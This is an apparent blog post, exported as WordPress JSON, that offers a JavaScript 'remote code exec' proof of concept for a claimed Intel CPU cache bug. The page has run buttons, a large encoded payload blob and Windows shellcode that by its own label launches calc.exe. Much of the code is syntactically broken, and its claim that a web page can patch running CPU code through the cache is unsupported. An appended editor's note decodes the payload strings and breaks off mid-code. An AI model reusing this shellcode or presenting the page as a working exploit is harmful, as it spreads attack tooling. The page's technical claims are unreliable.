{"id":7232,"date":"2012-07-14T08:57:11","date_gmt":"2012-07-14T01:57:11","guid":{"rendered":"http:\/\/deepquest.code511.com\/blog\/?p=7232"},"modified":"2012-07-14T08:57:11","modified_gmt":"2012-07-14T01:57:11","slug":"cpu-cache-controller-bug-exploit-remote-code-exec-mod-poc","status":"publish","type":"post","link":"https:\/\/deepquest.code511.com\/blog\/2012\/07\/cpu-cache-controller-bug-exploit-remote-code-exec-mod-poc\/","title":{"rendered":"CPU cache controller bug exploit (Remote code exec mod poc)"},"content":{"rendered":"<p>This bug can&#8217;t be fixed by a software update; it stays with the machine until you change computer. Below is a remote code execution PoC in JavaScript which, according to its authors, runs its payload directly from the cache of an Intel Core 2 Duo CPU.<\/p>\n<p><!--more--><\/p>\n<pre>--&gt;Beginning of POC\r\n\r\n&lt;html&gt;\r\n\t&lt;head&gt;\r\n\t\t&lt;title&gt; CPU cache controller bug exploit (Remote code exec mod poc)&lt;\/title&gt;\r\n\t&lt;\/head&gt;\r\n\r\n&lt;body&gt;\r\n&lt;script type=\"text\/javascript\"&gt;\r\n\r\nvar microcode = 257;\r\nvar N_CORE = 4;\r\nvar XXL = 9*1024*1024;\r\nvar buf = 9437185;\r\n\r\nvar p = {};\r\nvar bug;\r\nvar result;\r\nvar n = {};\r\nfunction init_c(){};\r\nfunction engine(p, n){};\r\n\r\nfunction test(result){\r\n\/\/ debug: testing micro-program for the old vm, does not work now \r\n\/\/ latter comment 1: oh. my! it works! 
wow!\r\n\/\/ latter comment 2: it works, but it does not what it's expected to\r\n\/\/ dw buf[]={1,-3,0, -6,9,1, 13,-67,2, -69,96,3, 1,-1,4,\r\n\/\/ -3,3,5, 16,-27,6, -66,99,7, 55,-1,8, -1,-3,9, 0,-67,10};\r\n\r\n\/\/ the infinite loop will be patched on the fly because of the Intel CPU bug\r\n\/\/ addr of the test() func should be aligned by 4Kb boundary,\r\n\/\/ 1st dword will be changed to NOP, NOP, NOP, NOP\r\n\/\/ it's possible to change the kernel memory as well,\r\n\/\/ two things:\r\n\/\/ 1) alignment;\r\n\/\/ 2) the code is currently executed;\r\n\/\/\r\n\/\/ engine() obtains the address of test(), but does not check it,\r\n\/\/ so if you replace it, you have to check the conditionals above by yourself.\r\n\/\/ also the content to overwrite. if you want to change data memory\r\n\/\/ it's supposed to be in the cache as well.\r\n\/*\r\n\r\nASM:\r\n        .text\r\n.globl main\r\n        .type   main, @function\r\nL1:\r\n        xorl %ecx, %ecx\r\n\r\nmain:\r\n        pushl   %ebp\r\n        movl    %esp, %ebp\r\n        popl    %ebp\r\n        loop L1\r\n        ret\r\n        .size   main, .-main\r\n\r\nDISASM:\r\n\r\n080483b4 &lt;L1&gt;:\r\n80483b4:\t31 c9                \txor    %ecx,%ecx\r\n\r\n080483b6 &lt;main&gt;:\r\n80483b6:\t55                   \tpush   %ebp\r\n80483b7:\t89 e5                \tmov    %esp,%ebp\r\n80483b9:\t5d                   \tpop    %ebp\r\n80483ba:\te2 f8                \tloop   80483b4 &lt;L1&gt;\r\n80483bc:\tc3                   \tret    \r\n80483bd:\t90                   \tnop\r\n80483be:\t90                   \tnop\r\n80483bf:\t90                   \tnop\r\n\r\n*\/\r\n\tunescape('%u31C9%u5589%uE55D%u2EF8%uC390%u9090');\r\n\treturn 0;\r\n}\r\n\r\nfunction ThreadProc(lpParameter){\r\n\tengine(buf, microcode*3);\r\n\treturn(0);\r\n}\r\n\r\nfunction ThreadProc_dbg(bug){\r\n\tvar result = 1;\r\n\ttest(result);\r\n\tif (result != 1){\r\n\t\tdocument.write(\"&lt;h1&gt;[+] your CPU is buggy!&lt;h1&gt;\");\r\n    
}\r\n\telse{\r\n\t\tdocument.write(\"&lt;h1&gt;[-] your CPU isn't buggy!&lt;h1&gt;\");\r\n\t\t\/\/eueeuereturn(0);\r\n\t}\r\n}\r\n\r\nfunction microcode_vm(){\r\n\tvar evilcode = \"6B70%u6E63%u2066%u6F72%u204A%u442E%u2066%u6F72%u2049%u6E74\"+\r\n\t\"%u656C%u2043%u6F72%u6520%u3220%u4475%u6F20%u5435%u3735%u300D%u0A28%u6329\"+\r\n\t\"%u2053%u656C%u656E%u612F%u2F32%u3030%u372C%u2032%u3030%u3800%u2B00%u0000\"+\r\n\t\"%u0500%u0000%u2600%u0000%u3E00%u0000%u4702%u0000%uE7FD%uFFFF%u0000%u0000\"+\r\n\t\"%uA3FF%uFFFF%uA7FF%uFFFF%u0100%u0000%u0200%u0000%u0A00%u0000%u0200%u0000\"+\r\n\t\"%u0100%u0000%u0900%u0000%u0300%u0000%u0400%u0000%u1400%u0000%u0400%u0000\"+\r\n\t\"%u1F00%u0000%u2B00%u0000%u0500%u0000%u2600%u0000%u3E00%u0000%u0600%u0000\"+\r\n\t\"%u0D00%u0000%u2500%u0000%u0700%u0000%u3000%u0000%u4000%u0000%u0800%u0000\"+\r\n\t\"%u6B00%u0000%u8F00%u0000%u0900%u0000%uFA00%u0000%u1201%u0000%u0A00%u0000\"+\r\n\t\"%uC901%u0000%uE101%u0000%u0B00%u0000%u0C00%u0000%u3C00%u0000%u0C00%u0000\"+\r\n\t\"%u1700%u0000%u3300%u0000%u0D00%u0000%u0E00%u0000%u3600%u0000%u0E00%u0000\"+\r\n\t\"%u1500%u0000%u4D00%u0000%u0F00%u0000%u6800%u0000%u8800%u0000%u1000%u0000\"+\r\n\t\"%uD300%u0000%u1701%u0000%u1100%u0000%uF201%u0000%u3A02%u0000%u1200%u0000\"+\r\n\t\"%uF103%u0000%u3904%u0000%u1300%u0000%uF407%u0000%u2408%u0000%u1400%u0000\"+\r\n\t\"%uEF0F%u0000%u3B10%u0000%u1500%u0000%u961F%u0000%uCE1F%u0000%u1600%u0000\"+\r\n\t\"%u1D00%u0000%u7500%u0000%u1700%u0000%u2000%u0000%u7000%u0000%u1800%u0000\"+\r\n\t\"%u1B00%u0000%u7F00%u0000%u1900%u0000%u2A00%u0000%u6200%u0000%u1A00%u0000\"+\r\n\t\"%u1900%u0000%u7100%u0000%u1B00%u0000%u3C00%u0000%u8C00%u0000%u1C00%u0000\"+\r\n\t\"%uE700%u0000%u2301%u0000%u1D00%u0000%u9E01%u0000%uE601%u0000%u1E00%u0000\"+\r\n\t\"%u2500%u0000%u9D00%u0000%u1F00%u0000%uD800%u0000%u1801%u0000%u2000%u0000\"+\r\n\t\"%uA301%u0000%u2702%u0000%u2100%u0000%uE203%u0000%u6A04%u0000%u2200%u0000\"+\r\n\t\"%uE107%u0000%u6908%u0000%u2300%u0000%uE40F%u0000%u7410%u0000%u2400%u0000\"+\r\n\t\"%uFF1F%
u0000%u4B20%u0000%u2500%u0000%uC63F%u0000%u1E40%u0000%u2600%u0000\"+\r\n\t\"%uAD7F%u0000%u0580%u0000%u2700%u0000%uD0FF%u0000%u6000%u0100%u2800%u0000\"+\r\n\t\"%uCBFF%u0100%u6F00%u0200%u2900%u0000%uDAFF%u0300%u7200%u0400%u2A00%u0000\"+\r\n\t\"%u29FF%u0700%u81FF%u0700%u2B00%u0000%u2C00%u0000%u9C00%u0000%u2C00%u0000\"+\r\n\t\"%u3700%u0000%u9300%u0000%u2D00%u0000%u2E00%u0000%u9600%u0000%u2E00%u0000\"+\r\n\t\"%u3500%u0000%uED00%u0000%u2F00%u0000%u4800%u0000%uE800%u0000%u3000%u0000\"+\r\n\t\"%u3300%u0000%uF700%u0000%u3100%u0000%u5200%u0000%uDA00%u0000%u3200%u0000\"+\r\n\t\"%u1100%u0000%u9900%u0000%u3300%u0000%u1400%u0000%u8400%u0000%u3400%u0000\"+\r\n\t\"%u0F00%u0000%u9B00%u0000%u3500%u0000%u3600%u0000%uEE00%u0000%u3600%u0000\"+\r\n\t\"%u7D00%u0000%u1501%u0000%u3700%u0000%uC001%u0000%u5002%u0000%u3800%u0000\"+\r\n\t\"%u3B03%u0000%uDF03%u0000%u3900%u0000%u4A00%u0000%uC200%u0000%u3A00%u0000\"+\r\n\t\"%u3900%u0000%uD100%u0000%u3B00%u0000%u5C00%u0000%u2C01%u0000%u3C00%u0000\"+\r\n\t\"%uC701%u0000%u4302%u0000%u3D00%u0000%u3E03%u0000%uC603%u0000%u3E00%u0000\"+\r\n\t\"%u4500%u0000%u3D01%u0000%u3F00%u0000%uB801%u0000%u3802%u0000%u4000%u0000\"+\r\n\t\"%u4303%u0000%u4704%u0000%u4100%u0000%uC207%u0000%uCA08%u0000%u4200%u0000\"+\r\n\t\"%uC10F%u0000%uC910%u0000%u4300%u0000%uC41F%u0000%uD420%u0000%u4400%u0000\"+\r\n\t\"%uDF3F%u0000%uEB40%u0000%u4500%u0000%uE67F%u0000%uFE80%u0000%u4600%u0000\"+\r\n\t\"%uCDFF%u0000%uE500%u0100%u4700%u0000%uF0FF%u0100%u8000%u0200%u4800%u0000\"+\r\n\t\"%uABFF%u0300%uCF00%u0400%u4900%u0000%uBAFF%u0700%uD200%u0800%u4A00%u0000\"+\r\n\t\"%u89FF%u0F00%u2100%u1000%u4B00%u0000%u4CFF%u1F00%u7C00%u2000%u4C00%u0000\"+\r\n\t\"%uD7FF%u3F00%uF300%u4000%u4D00%u0000%uCEFF%u7F00%uF600%u8000%u4E00%u0000\"+\r\n\t\"%uD5FF%uFF00%u8D00%u0001%u4F00%u0000%uA8FF%uFF01%uC800%u0002%u5000%u0000\"+\r\n\t\"%u93FF%uFF03%uD700%u0004%u5100%u0000%uB2FF%uFF07%uFA00%u0008%u5200%u0000\"+\r\n\t\"%uB1FF%uFF0F%uF900%u0010%u5300%u0000%uB4FF%uFF1F%uE400%u0020%u5400%u0000\"+\r\n\t\"%uAFFF%uFF3F%uF
B00%u0040%u5500%u0000%u56FE%uFF7F%u0EFF%uFF7F%u5600%u0000\"+\r\n\t\"%u5D00%u0000%u3501%u0000%u5700%u0000%u6000%u0000%u3001%u0000%u5800%u0000\"+\r\n\t\"%u5B00%u0000%u3F01%u0000%u5900%u0000%u6A00%u0000%u2201%u0000%u5A00%u0000\"+\r\n\t\"%u5900%u0000%u3101%u0000%u5B00%u0000%u7C00%u0000%uCC01%u0000%u5C00%u0000\"+\r\n\t\"%uA700%u0000%uE301%u0000%u5D00%u0000%u5E00%u0000%u2601%u0000%u5E00%u0000\"+\r\n\t\"%u6500%u0000%uDD01%u0000%u5F00%u0000%u9800%u0000%uD801%u0000%u6000%u0000\"+\r\n\t\"%u6300%u0000%uE701%u0000%u6100%u0000%uA200%u0000%uAA01%u0000%u6200%u0000\"+\r\n\t\"%u2100%u0000%u2901%u0000%u6300%u0000%u2400%u0000%u3401%u0000%u6400%u0000\"+\r\n\t\"%u3F00%u0000%u0B01%u0000%u6500%u0000%u0600%u0000%u5E01%u0000%u6600%u0000\"+\r\n\t\"%u6D00%u0000%uC501%u0000%u6700%u0000%u9000%u0000%uA001%u0000%u6800%u0000\"+\r\n\t\"%u0B00%u0000%u2F01%u0000%u6900%u0000%u1A00%u0000%u3201%u0000%u6A00%u0000\"+\r\n\t\"%u6900%u0000%uC101%u0000%u6B00%u0000%uEC00%u0000%u5C02%u0000%u6C00%u0000\"+\r\n\t\"%uF703%u0000%u5305%u0000%u6D00%u0000%uEE07%u0000%u5609%u0000%u6E00%u0000\"+\r\n\t\"%uF50F%u0000%u2D11%u0000%u6F00%u0000%u881F%u0000%uA820%u0000%u7000%u0000\"+\r\n\t\"%u733E%u0000%uB73F%u0000%u7100%u0000%u9200%u0000%u9A01%u0000%u7200%u0000\"+\r\n\t\"%u5100%u0000%uD901%u0000%u7300%u0000%uD400%u0000%u4402%u0000%u7400%u0000\"+\r\n\t\"%uCF03%u0000%u5B05%u0000%u7500%u0000%uF607%u0000%u2E09%u0000%u7600%u0000\"+\r\n\t\"%uBD0F%u0000%u5511%u0000%u7700%u0000%u801F%u0000%u9020%u0000%u7800%u0000\"+\r\n\t\"%u7B3E%u0000%u9F3F%u0000%u7900%u0000%u8A00%u0000%u8201%u0000%u7A00%u0000\"+\r\n\t\"%u7900%u0000%u9101%u0000%u7B00%u0000%u9C00%u0000%u6C02%u0000%u7C00%u0000\"+\r\n\t\"%u8703%u0000%u8304%u0000%u7D00%u0000%u7E06%u0000%u8607%u0000%u7E00%u0000\"+\r\n\t\"%u8500%u0000%u7D02%u0000%u7F00%u0000%u7803%u0000%u7804%u0000%u8000%u0000\"+\r\n\t\"%u8306%u0000%u8708%u0000%u8100%u0000%u820F%u0000%u8A11%u0000%u8200%u0000\"+\r\n\t\"%u811F%u0000%u8921%u0000%u8300%u0000%u843F%u0000%u9441%u0000%u8400%u0000\"+\r\n\t\"%u9F7F%u0000%uAB81%u000
0%u8500%u0000%uA6FF%u0000%uBE01%u0100%u8600%u0000\"+\r\n\t\"%u8DFF%u0100%uA501%u0200%u8700%u0000%uB0FF%u0300%uC001%u0400%u8800%u0000\"+\r\n\t\"%uEBFF%u0700%u0F01%u0800%u8900%u0000%u7AFF%u0F00%u9201%u1000%u8A00%u0000\"+\r\n\t\"%u49FF%u1F00%u6100%u2000%u8B00%u0000%u8CFE%u3F00%uBC00%u4000%u8C00%u0000\"+\r\n\t\"%u97FF%u7F00%uB301%u8000%u8D00%u0000%u8EFF%uFF00%uB601%u0001%u8E00%u0000\"+\r\n\t\"%u95FF%uFF01%uCD01%u0002%u8F00%u0000%uE8FF%uFF03%u0801%u0004%u9000%u0000\"+\r\n\t\"%u53FF%uFF07%u9701%u0008%u9100%u0000%u72FF%uFF0F%uBA01%u0010%u9200%u0000\"+\r\n\t\"%u71FF%uFF1F%uB901%u0020%u9300%u0000%u74FF%uFF3F%uA401%u0040%u9400%u0000\"+\r\n\t\"%u6FFF%uFF7F%uBB01%u0080%u9500%u0000%u16FF%uFFFF%u4E00%u0000%u9600%u0000\"+\r\n\t\"%u9DFE%uFFFF%uF500%u0000%u9700%u0000%uA0FF%uFFFF%uF001%u0000%u9800%u0000\"+\r\n\t\"%u9BFF%uFFFF%uFF01%u0000%u9900%u0000%uAAFF%uFFFF%uE201%u0000%u9A00%u0000\"+\r\n\t\"%u99FF%uFFFF%uF101%u0000%u9B00%u0000%uBCFF%uFFFF%u0C01%u0000%u9C00%u0000\"+\r\n\t\"%u67FF%uFFFF%uA301%u0000%u9D00%u0000%u1EFF%uFFFF%u6600%u0000%u9E00%u0000\"+\r\n\t\"%uA5FE%uFFFF%u1D00%u0000%u9F00%u0000%u58FF%uFFFF%u9801%u0000%uA000%u0000\"+\r\n\t\"%u23FF%uFFFF%uA701%u0000%uA100%u0000%u62FF%uFFFF%uEA01%u0000%uA200%u0000\"+\r\n\t\"%u61FF%uFFFF%uE901%u0000%uA300%u0000%u64FF%uFFFF%uF401%u0000%uA400%u0000\"+\r\n\t\"%u7FFF%uFFFF%uCB01%u0000%uA500%u0000%u46FF%uFFFF%u9E01%u0000%uA600%u0000\"+\r\n\t\"%u2DFF%uFFFF%u8501%u0000%uA700%u0000%u50FF%uFFFF%uE001%u0000%uA800%u0000\"+\r\n\t\"%u4BFF%uFFFF%uEF01%u0000%uA900%u0000%u5AFF%uFFFF%uF201%u0000%uAA00%u0000\"+\r\n\t\"%uA9FC%uFFFF%u01FE%uFFFF%uAB00%u0000%uAC00%u0000%u1C02%u0000%uAC00%u0000\"+\r\n\t\"%uB700%u0000%u1302%u0000%uAD00%u0000%uAE00%u0000%u1602%u0000%uAE00%u0000\"+\r\n\t\"%uB500%u0000%u6D02%u0000%uAF00%u0000%uC800%u0000%u6802%u0000%uB000%u0000\"+\r\n\t\"%uB300%u0000%u7702%u0000%uB100%u0000%uD200%u0000%u5A02%u0000%uB200%u0000\"+\r\n\t\"%u9100%u0000%u1902%u0000%uB300%u0000%u9400%u0000%u0402%u0000%uB400%u0000\"+\r\n\t\"%u8F00%u0000%u1B02%u0000%uB500%
u0000%uB600%u0000%u6E02%u0000%uB600%u0000\"+\r\n\t\"%uFD00%u0000%u9503%u0000%uB700%u0000%u4001%u0000%uD003%u0000%uB800%u0000\"+\r\n\t\"%uBB00%u0000%u5F02%u0000%uB900%u0000%uCA00%u0000%u4202%u0000%uBA00%u0000\"+\r\n\t\"%uB900%u0000%u5102%u0000%uBB00%u0000%uDC00%u0000%uAC03%u0000%uBC00%u0000\"+\r\n\t\"%u4701%u0000%uC303%u0000%uBD00%u0000%uBE00%u0000%u4602%u0000%uBE00%u0000\"+\r\n\t\"%uC500%u0000%uBD03%u0000%uBF00%u0000%u3801%u0000%uB803%u0000%uC000%u0000\"+\r\n\t\"%uC300%u0000%uC703%u0000%uC100%u0000%u4201%u0000%u4A03%u0000%uC200%u0000\"+\r\n\t\"%u4100%u0000%u4902%u0000%uC300%u0000%u4400%u0000%u5402%u0000%uC400%u0000\"+\r\n\t\"%u5F00%u0000%u6B02%u0000%uC500%u0000%u6600%u0000%u7E02%u0000%uC600%u0000\"+\r\n\t\"%u4D00%u0000%u6502%u0000%uC700%u0000%u7000%u0000%u0002%u0000%uC800%u0000\"+\r\n\t\"%u2B00%u0000%u4F02%u0000%uC900%u0000%u3A00%u0000%u5202%u0000%uCA00%u0000\"+\r\n\t\"%u0900%u0000%uA102%u0000%uCB00%u0000%uCC00%u0000%uFC03%u0000%uCC00%u0000\"+\r\n\t\"%u5701%u0000%u7303%u0000%uCD00%u0000%u4E00%u0000%u7602%u0000%uCE00%u0000\"+\r\n\t\"%u5500%u0000%u0D02%u0000%uCF00%u0000%u2800%u0000%u4802%u0000%uD000%u0000\"+\r\n\t\"%u1300%u0000%u5702%u0000%uD100%u0000%u3200%u0000%u7A02%u0000%uD200%u0000\"+\r\n\t\"%u3100%u0000%u7902%u0000%uD300%u0000%u3400%u0000%u6402%u0000%uD400%u0000\"+\r\n\t\"%u2F00%u0000%u7B02%u0000%uD500%u0000%uD600%u0000%u8E03%u0000%uD600%u0000\"+\r\n\t\"%uDD01%u0000%uB504%u0000%uD700%u0000%uE007%u0000%uB00A%u0000%uD800%u0000\"+\r\n\t\"%uDB0F%u0000%uBF12%u0000%uD900%u0000%uEA1F%u0000%uA222%u0000%uDA00%u0000\"+\r\n\t\"%uD93F%u0000%uB142%u0000%uDB00%u0000%uFC7F%u0000%u4C82%u0000%uDC00%u0000\"+\r\n\t\"%u27FF%u0000%u6301%u0100%uDD00%u0000%uDEFC%u0100%uA6FF%u0100%uDE00%u0000\"+\r\n\t\"%uE501%u0000%u5D04%u0000%uDF00%u0000%u1807%u0000%u5809%u0000%uE000%u0000\"+\r\n\t\"%uE30C%u0000%u670F%u0000%uE100%u0000%u2201%u0000%u2A03%u0000%uE200%u0000\"+\r\n\t\"%uA100%u0000%uA903%u0000%uE300%u0000%uA401%u0000%uB404%u0000%uE400%u0000\"+\r\n\t\"%uBF07%u0000%u8B0A%u0000%uE500%u0000%u8
60F%u0000%uDE12%u0000%uE600%u0000\"+\r\n\t\"%uED1F%u0000%u4522%u0000%uE700%u0000%u103F%u0000%u2041%u0000%uE800%u0000\"+\r\n\t\"%u8B7C%u0000%uAF7F%u0000%uE900%u0000%u9A01%u0000%uB204%u0000%uEA00%u0000\"+\r\n\t\"%uE907%u0000%u410A%u0000%uEB00%u0000%u6C0F%u0000%uDC12%u0000%uEC00%u0000\"+\r\n\t\"%u771F%u0000%uD322%u0000%uED00%u0000%u6E3F%u0000%uD642%u0000%uEE00%u0000\"+\r\n\t\"%u757F%u0000%uAD82%u0000%uEF00%u0000%u08FF%u0000%u2801%u0100%uF000%u0000\"+\r\n\t\"%uF3FC%u0100%u37FF%u0100%uF100%u0000%u1201%u0000%u1A03%u0000%uF200%u0000\"+\r\n\t\"%uD100%u0000%u5903%u0000%uF300%u0000%u5401%u0000%uC404%u0000%uF400%u0000\"+\r\n\t\"%u4F07%u0000%uDB0A%u0000%uF500%u0000%u760F%u0000%uAE12%u0000%uF600%u0000\"+\r\n\t\"%u3D1F%u0000%uD522%u0000%uF700%u0000%u003F%u0000%u1041%u0000%uF800%u0000\"+\r\n\t\"%uFB7C%u0000%u1F7F%u0000%uF900%u0000%u0A01%u0000%u0203%u0000%uFA00%u0000\"+\r\n\t\"%uF900%u0000%u1103%u0000%uFB00%u0000%u1C01%u0000%uEC04%u0000%uFC00%u0000\"+\r\n\t\"%u0707%u0000%u0309%u0000%uFD00%u0000%uFE0C%u0000%u060F%u0000%uFE00%u0000\"+\r\n\t\"%u0501%u0000%uFD04%u0000%uFF00%u0000%uF806%u0000%uF808%u0000%u0001%u0000\";\r\n\tunescape(evilcode);\r\n}\r\n\r\n\/*\r\n\/\/ THREATED IMPLEMENTATION\r\nfunction init(){\r\n\tdocument.write(\"&lt;p&gt;[!] 
Exploit Running&lt;\/p&gt;&lt;br&gt;\");\r\n\tdocument.write(\"[+] Loading micro-program\");\r\n\tmicrocode_vm();\r\n\tvar a, id, handle;\r\n\tvar size = 111;\r\n\tdocument.write(\"initializing XX thread...\");\r\n\r\n\tfor (a=1; a &lt; N_CORE; a++){\r\n\t\t\t\/\/code should be written for debug.\r\n\t}\r\n\r\n}\r\n\r\n*\/\r\n\r\nfunction vm_engine()\r\n{\r\n\tvar a, dw, f1, f2, f3, fn, f0 = -1, dt = 0;\r\n\tfor(;;){\r\n\t\tmicrocode_vm();\r\n\t\tf1;\r\n\t\tunescape = (p + ((dt++) % n));\r\n\t\tf2 = (p + ((dt++) % n));\r\n\t\tf3 = (p + ((dt++) % n));\r\n\r\n\t\t\/\/ vm + scrambler + dynamic encoder + multi-pass obfuscator\r\n\t\tfn = -1 ^ (f1 ^ f2) + ((dt + f1) ^ f2) ^ f0;\r\n\r\n\t\t\/\/ a few minutes to trigger this condition on a 2.4 GHz PC\r\n\t\tif ( ((f1 ^ f2) == 0) || (f1 ^ f2 ^ f3) == 0)\r\n\t\t{\r\n\t\t\t\/\/ a sync problem. it would be better to use locks over here.\r\n\t\t\t\/\/ crash happens. crash is not shit. crash means code works.\r\n\t\t\t\/\/ so, should we really care about the addr and the content?\r\n\t\t\t\/\/ it works for Intel Core 2 Duo T5750. 
o_o 5 ~ 10 minutes of\r\n\t\t\t\/\/ it gives BSOD on Intel Atom N270 cpu o_o less than an hour\r\n\t\t\tf3 = test(result); f1 = unescape(\"%u9090%u9090\") ^ f0 + \r\n\t\t\t\/\/ Shellcode Calculator \r\n\t\t\tunescape(\"%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800\"+   \r\n                     \"%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A\" +   \r\n                     \"%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350\" +   \r\n                     \"%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40\" +   \r\n                     \"%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000\" +   \r\n                     \"%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040\" +   \r\n                     \"%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD\" +   \r\n                     \"%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40\" +   \r\n                     \"%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18\" +   \r\n                     \"%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0\" +   \r\n                     \"%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B\" +   \r\n                     \"%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24\" +   \r\n                     \"%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9\" +   \r\n                     \"%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C\" +   \r\n                     \"%u652E%u6578%u9000\"); f2 = test ^ fn;\r\n\r\n\t\t\tdocument.write(\"&lt;br&gt;&lt;br&gt;w00t! w00t! 
u g0t r00t ?!&lt;br&gt;\");\r\n\t\t}\t(p + (f3 % n)) = fn; f0 = fn; \/* f0 = fn ^ dt *\/ ;\r\n\t}\r\n}\r\n\r\nfunction demo()\r\n{\r\n\tvar n;\r\n\tdocument.write(\"HITB 2008 missing exploit :=) by Selena&lt;br&gt;&lt;br&gt;\");\r\n\tdocument.write(\"micro-code is written by Selena&lt;br&gt;\");\r\n\tdocument.write(\"virtual machine is designed by Selena&lt;br&gt;\");\r\n\tdocument.write(\"virtual machine has been rewritten by nezumi&lt;br&gt;&lt;br&gt;\");\r\n\tdocument.write(\"exploit PoC rewritten by S4(uR4 for remote attack demo 2012&lt;br&gt;&lt;br&gt;\");\r\n\t\/\/setTimeout(9000);\r\n\tdocument.write(\"[!]&lt;b&gt; Exploit Running&lt;\/b&gt;\");\r\n\tvm_engine(); \/\/if (n == 0) { init_t();} ;\r\n\t\/\/if(result != 0){\r\n\t\tdocument.write(\"&lt;br&gt;&lt;b&gt;[+] Done!&lt;\/b&gt;\");\r\n\t\/\/}\r\n}\r\n\r\n&lt;\/script&gt;\r\n&lt;h1&gt;CPU cache controller bug exploit Remote code exec mod&lt;\/h1&gt;\r\n\r\n&lt;button onClick=\"ThreadProc_dbg(bug)\"&gt;&lt;b&gt;&amp;bull; Check vuln&lt;\/b&gt; &amp;raquo;&lt;\/button&gt;\r\n&lt;button onClick=\"demo()\"&gt;&lt;b&gt;PoC Run!&lt;\/b&gt; &amp;rarr;&lt;\/button&gt;\r\n\r\n&lt;\/body&gt;<\/pre>\n<pre>credits: S4(uR4<\/pre>\n","protected":false},"excerpt":{"rendered":"<p>This bug \u00a0won&#8217;t be updated unless you change computer. 
It&#8217;s a remote code exec mod poc in javascript, the code will execute directly on your Intel Core2DUO CPU cache.<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_seopress_robots_primary_cat":"","_seopress_titles_title":"","_seopress_titles_desc":"","_seopress_robots_index":"","jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[43,139],"tags":[2178],"class_list":["post-7232","post","type-post","status-publish","format-standard","hentry","category-exploit","category-tools","tag-poc"],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"jetpack_shortlink":"https:\/\/wp.me\/p4bBYZ-1SE","_links":{"self":[{"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/posts\/7232","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/comments?post=7232"}],"version-history":[{"count":3,"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/posts\/7232\/revisions"}],"predecessor-version":[{"id":7239,"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/posts\/7232\/revisions\/7239"}],"wp:attachment":[{"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/media?parent=7232"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/categories?post=7232"},{"taxonomy":"post_tag","embeddabl
e":true,"href":"https:\/\/deepquest.code511.com\/blog\/wp-json\/wp\/v2\/tags?post=7232"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
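Editor's note, added here and not part of the PoC or of S4(uR4's code: before believing what a PoC's comments say, decode the `%uXXXX` strings it passes to `unescape()` and look at the bytes. `unescape("%u31C9")` yields one UTF-16 code unit, 0x31C9, which a browser of that era laid out in its heap low byte first (C9 31), so shellcode meant to run from such a string has to be written byte-swapped. The small Node.js tool below (function names, the strict parser and the analysis are mine; the sample constants are copied from the PoC above) decodes three payload fragments in both byte orders. It shows that the `test()` string matches the DISASM comment only when read high byte first, and even then disagrees at one byte (`%u2EF8` where the listing has `e2 f8`, the `loop` opcode); that the `evilcode` string is missing its first `%u` and, read high byte first, is plain ASCII text rather than code; and that the tail of the "Shellcode Calculator" decodes little-endian to the string `calc.exe`.

```javascript
// Added example, not part of the PoC above: decode the "%uXXXX" strings that
// the PoC hands to unescape() and look at the bytes they actually carry.
// Function names and the strict parser are the editor's; the sample constants
// are copied from the PoC source. Runs stand-alone under Node.js.

// Split a %uXXXX run into 16-bit code units. Any stray text aborts, so a
// missing or mistyped "%u" is reported instead of silently shifting the bytes.
function parseUnits(encoded) {
  const units = [];
  const re = /%u([0-9a-fA-F]{4})/g;
  let consumed = 0;
  let m;
  while ((m = re.exec(encoded)) !== null) {
    if (m.index !== consumed) {
      throw new Error(`not %uXXXX at offset ${consumed}: "${encoded.slice(consumed, m.index)}"`);
    }
    units.push(parseInt(m[1], 16));
    consumed = re.lastIndex;
  }
  if (consumed !== encoded.length) {
    throw new Error(`trailing text at offset ${consumed}: "${encoded.slice(consumed)}"`);
  }
  return units;
}

// Bytes as the string sits in a UTF-16LE heap: low byte of each unit first.
// This is the order the CPU would fetch if the string were ever executed.
function toLittleEndianBytes(units) {
  const out = new Uint8Array(units.length * 2);
  units.forEach((u, i) => { out[2 * i] = u & 0xff; out[2 * i + 1] = u >>> 8; });
  return out;
}

// Bytes in the order the hex digits were typed: high byte first. This is what
// you get when an author joins hex pairs without swapping them for the heap.
function toBigEndianBytes(units) {
  const out = new Uint8Array(units.length * 2);
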